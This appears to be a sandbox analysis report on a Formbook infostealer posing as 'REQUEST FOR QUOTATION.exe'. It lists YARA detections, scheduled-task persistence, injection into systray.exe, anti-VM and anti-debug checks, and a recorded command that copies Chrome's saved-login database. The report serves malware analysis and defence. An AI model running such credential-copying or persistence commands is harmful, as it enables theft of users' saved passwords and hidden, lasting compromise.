Source: 00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.711261795.00000000014F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.711261795.00000000014F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.922843352.0000000003220000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.922843352.0000000003220000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.667885157.0000000004259000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.667885157.0000000004259000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.708917355.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.708917355.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.922231551.0000000000E90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.922231551.0000000000E90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.REQUEST FOR QUOTATION.exe.439e310.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.REQUEST FOR QUOTATION.exe.439e310.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.REQUEST FOR QUOTATION.exe.43f3530.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.REQUEST FOR QUOTATION.exe.43f3530.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@10/9@8/3

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe

File created: C:\Users\user\AppData\Roaming\JzXynzIhLqqy.exe

Jump to behavior

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Mutant created: \Sessions\1\BaseNamedObjects\uqQPXEaOhupEdXy
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4824:120:WilError_01

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe

File created: C:\Users\user\AppData\Local\Temp\tmp9ADB.tmp

Jump to behavior

Source: REQUEST FOR QUOTATION.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.667409214.0000000003251000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.667409214.0000000003251000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);

Source: REQUEST FOR QUOTATION.exe	Virustotal: Detection: 28%
Source: REQUEST FOR QUOTATION.exe	ReversingLabs: Detection: 14%

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe

File read: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe 'C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JzXynzIhLqqy' /XML 'C:\Users\user\AppData\Local\Temp\tmp9ADB.tmp'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe
Source: unknown	Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JzXynzIhLqqy' /XML 'C:\Users\user\AppData\Local\Temp\tmp9ADB.tmp'
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process created: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Source: C:\Windows\SysWOW64\systray.exe

File written: C:\Users\user\AppData\Roaming\8LM54D1A\8LMlogri.ini

Jump to behavior

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Windows\SysWOW64\systray.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: REQUEST FOR QUOTATION.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: REQUEST FOR QUOTATION.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: REQUEST FOR QUOTATION.exe

Static file information: File size 1282048 > 1048576

Source: REQUEST FOR QUOTATION.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x134200

Source: REQUEST FOR QUOTATION.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: systray.pdb source: REQUEST FOR QUOTATION.exe, 00000005.00000002.711557561.0000000001690000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000002.934087091.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: systray.pdbGCTL source: REQUEST FOR QUOTATION.exe, 00000005.00000002.711557561.0000000001690000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: REQUEST FOR QUOTATION.exe, 00000005.00000002.710064884.0000000001190000.00000040.00000001.sdmp, systray.exe, 00000008.00000002.923476107.0000000005190000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: REQUEST FOR QUOTATION.exe, 00000005.00000002.710064884.0000000001190000.00000040.00000001.sdmp, systray.exe
Source:	Binary string: wscui.pdb source: explorer.exe, 00000006.00000002.934087091.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 1_2_018AEDFC pushad ; retf
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 1_2_018AEEF0 pushfd ; retf
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 1_2_058C2EB0 pushad ; ret
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 5_2_0041D0E2 push eax; ret
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 5_2_0041D0EB push eax; ret
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 5_2_0041D095 push eax; ret
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 5_2_0041D14C push eax; ret
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 5_2_0041BB69 push esi; ret
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0520D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0323BB69 push esi; ret
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0323D14C push eax; ret
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0323D095 push eax; ret
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0323D0E2 push eax; ret
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0323D0EB push eax; ret

Persistence and Installation Behavior:

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe

File created: C:\Users\user\AppData\Roaming\JzXynzIhLqqy.exe

Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JzXynzIhLqqy' /XML 'C:\Users\user\AppData\Local\Temp\tmp9ADB.tmp'

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xE3

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000001.00000002.667409214.0000000003251000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: REQUEST FOR QUOTATION.exe PID: 6992, type: MEMORY
Source: Yara match	File source: 1.2.REQUEST FOR QUOTATION.exe.32b277c.1.raw.unpack, type: UNPACKEDPE

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.667409214.0000000003251000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.667409214.0000000003251000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe	RDTSC instruction interceptor: First address: 00000000032298E4 second address: 00000000032298EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe	RDTSC instruction interceptor: First address: 0000000003229B4E second address: 0000000003229B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe

Code function: 5_2_00409A80 rdtsc

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe TID: 6996	Thread sleep time: -104471s >= -30000s
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe TID: 7044	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 7084	Thread sleep count: 37 > 30
Source: C:\Windows\explorer.exe TID: 7084	Thread sleep time: -74000s >= -30000s
Source: C:\Windows\SysWOW64\systray.exe TID: 5548	Thread sleep time: -44000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\systray.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\systray.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: explorer.exe, 00000006.00000000.680530454.0000000004710000.00000004.00000001.sdmp	Binary or memory string: 0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&f
Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.667409214.0000000003251000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000006.00000000.688491490.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.682528039.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.667409214.0000000003251000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000006.00000002.934414566.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.688491490.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.688769754.000000000A716000.00000004.00000001.sdmp	Binary or memory string: War&Prod_VMware_SATAa
Source: explorer.exe, 00000006.00000000.680530454.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000006.00000000.682528039.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000006.00000000.688769754.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000006.00000000.682528039.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.667409214.0000000003251000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000006.00000000.688878116.000000000A784000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.671585822.00000000064A0000.00000004.00000001.sdmp	Binary or memory string: Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94fc
Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.667409214.0000000003251000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000006.00000000.682528039.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe

Process information queried: ProcessInformation

Anti Debugging:

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\systray.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe

Code function: 5_2_00409A80 rdtsc

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe

Code function: 5_2_0040ACC0 LdrLoadDll,

Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0523A537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05288D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0527E539 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051C3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051C3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051C3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051C3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051C3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051C3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051C3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051C3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051C3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051C3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051C3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051C3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051C3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051BAD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051D7D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F3D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05233540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05263D40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051DC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051DC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_052805AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_052805AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051EFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051EFD9B mov eax, dword ptr fs:[00000030h]
